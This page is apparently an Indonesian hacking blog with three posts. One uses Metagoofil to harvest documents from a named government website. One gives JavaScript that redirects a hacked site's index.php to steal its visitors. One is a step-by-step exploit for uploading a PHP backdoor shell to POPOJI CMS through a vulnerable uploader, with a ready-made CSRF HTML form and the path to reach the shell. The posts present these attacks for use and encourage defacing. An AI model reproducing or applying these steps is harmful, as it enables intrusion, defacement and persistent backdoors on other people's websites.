Tampilkan postingan dengan label CMS Popoji. Tampilkan semua postingan
Tampilkan postingan dengan label CMS Popoji. Tampilkan semua postingan

Rabu, 18 Januari 2017

Cara Mendapatkan Dokumen di suatu Website dengan Metagoofil

Editing By: Yiyop[s]
Hello World ; Siang Fans, Please Say Hello Haters ;*
Haii kamu, iya kamu ,, Kamu yang masih dipisahkan oleh Jarak , Restu, dan Agama :') *maaf blm bisa nepatin janji* #ngaur wkwkw

niatnya sih ini artikel bakal gua Ketik besok, tapi baru inget, bsk kudu ke Pengadilan JakSel x'D *catch me if you can :p
yaudeh deh jadinye gua putuskan utk nulisnye sekarang bae, kali ini gua bakal Share Tutorial Cara Mendapatkan Dokumen dan File di suatu Website dengan Metagoofil di Linux .

btw apasih tool Metagoofil o.O ? silahkan selancar digoogle :p

ini adalah salah satu tool Information Gathering *pengumpulan data*
cocok utk Lu Mahasiswa/ anak sekolah ingusan, yang lagi butuh banyak Refrensi untuk Buat Skripsi, Makalah, atau kliping.
yang pasti pada artikel kali ini, kita cuma bakal membahas Salah Satu Fungsi dari Tool ini xP wkkwkw

Let's Fight Ghost

1. Buka terminal di kali linux anda lalu ketikan perintah :

metagoofil -h

Help: utk melihat perintah2 dan fungsi pada tool ini
jika command not found attau perintah tidak di temukan bisa di install dulu metagoofil Nya dengan perintah :

apt-get install metagoofil
kalo masih gk bisa berarti kali linux anda belum ada repositoryNya, silahkan kunjungi artikel kami -> List Repository beberapa Distro Linux

2. lalu siapkan website yang ingin Lu kepoin isi dokumenNya, kalo disini gua make contoh target :
www.indonesia.go.id  8| *sorry pak, hanya Edukasi utk adek2 pencinta OpenSource :p *

jika sudah, ketikan perintah seperti berikut :

metagoofil -d http://indonesia.go.id -t pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx -l 300 -n 50 -o indonesia -f index.html


Penjelasan:

-t : jenis file
-l : batas pencarian
-o : tempat folder menyimpan dokumen hasil kepo
-f : file laporan metagoofil
- http://indonesia.go.id: target (sesuaikan dgn target Lu)
- tempat folder menyimpan hasil, bisa lu ganti sesuka Lu *kalo disini gua make nama indonesia, biar keliatan nasionalisme aja sih :'v*

lalu akan tampak seperti ini , dan tunggu hingga prosessNya selesai :


noh, si tool lagi beraksi, nyedot2in file2 di web target

Kalo udah Kelar buka folder yang agan buat untuk menyimpan tadi (kalo gua folder "indonesia")

lihaaatt ,, daaann wooottsss :3
eits.. ada yang tertinggal yaitu laporan dari metagoofile yang tadi gua beri nama index.html pada directory "/home" , buka fileNya dan mantaps..

siap ndan, laporan kami terima ;*
btw agan bisa memanfaatkanNya untuk meilhat nilai sekolah atau soal2 di website sekolah, *tergantung webmasternye sih awkwak* #jdijanngarep

Udeh cukup Kaafiiirr belom o.O ?? sebelomnye ye bang , gua saranin bagi elu yang lg terkena Flu Onta, jan coba2 ini tool, kalo lu belom tau yang buat dari agama mane :v :v awas nanti auto kapir mz :v pffftt bruakakakakakakkakakakakk *aselingakakajg

Untuk selebihnyee silahkan eXplore sendiri ya kegunaan dan manfaat ini tool, yang pasti silahkan coba di Distro2 Linux kesayangan anda :p

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Information Gathering ~
Sekian dan semoga bermanfaat .. terimakasih


source and thanks to: With Out Shadow

./Nuenomaru

kalo agama dapat memisahkan ? kenapa tuhan menciptakannya






Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Sabtu, 15 Oktober 2016

Trik Redirect Website

Hello World ; Malem Fans, Please Say Hello Haters ;* #HappySadnight <(")
Selamat Malem Minggu mblo :p , tadinye mau malmingan tpi keknye bakal ujan nih, jdi Cancel deh (sepik ajeh :v)
jadi gua putusin buat Nulis artikel aja utk Pembaca Setia TKJ Cyber Art (alibi sok baik xD )
Kali ini Gua bakal share Salah Satu Cara / Trik Redirect Website .
hahah, yupz artikel kali ini Sederhana sih >.<" , mungkin dah banyak yang tau, karena ini emang Tutor eZ lah :')

Lanjut intip tutornye geenggs ;3

untuk tutor pada artikel kali ini,, Gua praktek pada WebSite yang sudah gua Hack/dipes/berhasil tanem WebShell Sebelumnye, redirect ke website yang Gua inginkan.
jadi buat Lu pade, terserah deh lu mau praktekin di web apa, atau web yg dah lu hack, seterah mau pake Cara/eXploit apaan :3
Ada kelebihan tersendiri ketika lu make trik ini, salah satunya website lu akan menerima traffic visitor dari website yang lu hack,  kan lumayan buat nambah visitor  '-')/

REDIRECT FULL

1. lu harus punya website yang sudah lu hack
2. masuk ke home directory atau public_html, lalu edit file index.php 


3. hapus code original / backup dulu (Hargai Karya WebMaster)
4. Ganti dengan code dibawah ini

<script> delayRedirect('http://tkjcyberart.blogspot.co.id/'); function delayRedirect(url) { var Timeout = setTimeout("window.location='" + url + "'",10); }</script>

Note:
http://tkjcyberart.blogspot.co.id/ = Ganti dengan website yang di tuju
10 = Time redirect dalam hitungan detik

JUST SHOW IN POP UP WINDOW


1. Sama seperti langkah sebelumnya, hanya saja berbeda code
2. code

<script language="javascript">
window.open('http://tkjcyberart.blogspot.co.id/','','width=900,height=700')
</script>

Note:
http://tkjcyberart.blogspot.co.id/ = Ganti dengan website yang di tuju
width = lebar window popup
height = tinggi window popup

awkkaw, Mudahkan o.O ?? Crotz ah, silahkan nih mayan utk yang maen GA, lumayan buat naikin Visitor Web, sama viewer artikel wkwkkw xD
tapi perlu di inget yee, Sorry TKJ Cyber Art gak maen cara beginian ;p wkwkw
Silahkan baca2 Tutorial berLabel Deface pada Blog Kami \('-')/

Stay Cool and Keep ./Crotz , gaes <(")


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy reading ;*
Sekian dan semoga bermanfaat .. terimakasih


Refrensi: yuzan0tes

./Nuenomaru

Mengertilah kami dan tak harus diHargai, karna Kami miliki Dunia Kami Sendiri

Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Minggu, 31 Juli 2016

Cara Upload Shell di CMS Popoji

Hello World ; Malam Fans, Please Say Hello Haters ;*
Kali ini Guee bakal Share Tutorial Cara Upload Shell di CMS Popoji , uihh :v akhirnye dah bisa upload shell wkwk <(")
ya riset upload shell ini gua dapet dari indoXploit *uihh galak inii para sesepuh, ngerisetnye ampe jozz >3<"
Sebelumnye Baca ini dulu: Deface Website berbasis CMS Popoji Lewat Register Account

okeii kita akan bahas disini, bagaimana meng-upload sebuah backdoor di POPOJI CMS

Pertama Lu harus sudah mendapatkan akses Login sebagai admin di web target !!
kalo sudah punya akun admin yang sudah terverif/aktif silahkan Lu login , sampai muncul ke page Dashbor admin


kalo dah Login, langsung buka URL bug/vuln di: 
target.c0li/po-admin/js/plugins/uploader/upload.php

Ciri2 Vuln o.O ?
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

nb: wajib Login ke halaman dashbor dlu yee, kalo mau liat ini letak bugnyee
CSRF Code:

<form method="post" action="target.c0li/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>

* save dgn ekstensi .html
* lalu bukak dengan browser kalean.

upload Shell lu. ingat shell kalian disini yang kalian upload harus berEkstensi .jpg (note: shellLu.jpg) , bukanlah .php, .phtml ataupun jenis bypass ekstensi yang lainnyaa.

jika berhasil . hasil output nya akan sama kyk yang pertama. tidak ada tulisan error sama sekali.

Terus cara tau Letak Shell nye Piye Om o.O ??


buka folder /po-upload/ , carane bukak url: target.c0li/po-content/po-upload/ , liat list yang kek di SS, carii shell lu, kalo dah ketemu Klik ae ..
kaloo pas folder /po-upload/ nya di buka ternyata muncul notice Forbidden wkkw, silahkan muter otak anda utk mencari backdoor lu wkwk..


akses shell: 
target/po-content/po-upload/nama_shell_anda-[angka_random]-polibrary.php


Hahaha, gak afdol yee ngeXploit tanpa tau cara bangunnye, Silahkan Baca artikel yg dulu Nue post di Blog ini: Tutorial Instalasi CMS Popoji

Sekian Artikel Cara MengUpload Backdoor pada CMS Popoji.
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Defacing gan ~
Sekian dan semoga bermanfaat .. terimakasih


Source and Thanks to: indoXploit


./Nuenomaru

Kami ada dan Berkarya, bukan utk disanjungi kok ^_^


Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i
 

ande ande lumoet Template by Ipietoon Cute Blog Design